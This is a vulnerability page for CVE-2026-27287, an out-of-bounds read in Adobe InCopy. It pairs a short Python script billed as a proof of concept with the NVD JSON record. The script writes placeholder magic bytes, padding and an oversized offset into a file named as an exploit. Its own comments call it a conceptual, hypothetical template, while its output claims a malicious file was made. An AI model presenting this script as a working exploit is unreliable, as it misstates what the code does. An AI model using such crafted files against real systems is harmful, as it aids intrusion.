CVE-2026-27287

import struct # PoC for CVE-2026-27287 (Conceptual) # This script generates a malformed file intended to trigger the out-of-bounds read. # Note: Actual file format structures for Adobe InCopy are proprietary and complex. # This is a generic template demonstrating the payload creation concept. def generate_malicious_file(filename): # Simulating a crafted file header header = b"\x06\x06\xED\xF5" # Example magic bytes # Constructing a specific pattern that might trigger the parser bug # The vulnerability occurs when parsing crafted data, causing OOB read. malformed_chunk = b"A" * 100 # Padding # Crafting a specific offset or length field (Hypothetical) # This value might cause the parser to read past the buffer evil_offset = struct.pack('<I', 0xFFFFFFFF) with open(filename, 'wb') as f: f.write(header) f.write(malformed_chunk) f.write(evil_offset) print(f"[+] Malicious file '{filename}' generated successfully.") print("[+] To test: Open this file in a vulnerable version of Adobe InCopy.") if __name__ == "__main__": generate_malicious_file("exploit_CVE-2026-27287.incd")

{"cve": {"id": "CVE-2026-27287", "sourceIdentifier": "[email protected]", "published": "2026-04-14T21:16:25.497", "lastModified": "2026-04-15T19:33:38.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InCopy versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:incopy:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.5.3", "matchCriteriaId": "4E9AFDF0-6924-4DC2-8CDF-214C302F411A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:incopy:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0", "versionEndExcluding": "21.3", "matchCriteriaId": "8CA72C62-5102-46F5-AF3B-C715E5C3E0DF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/incopy/apsb26-33.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}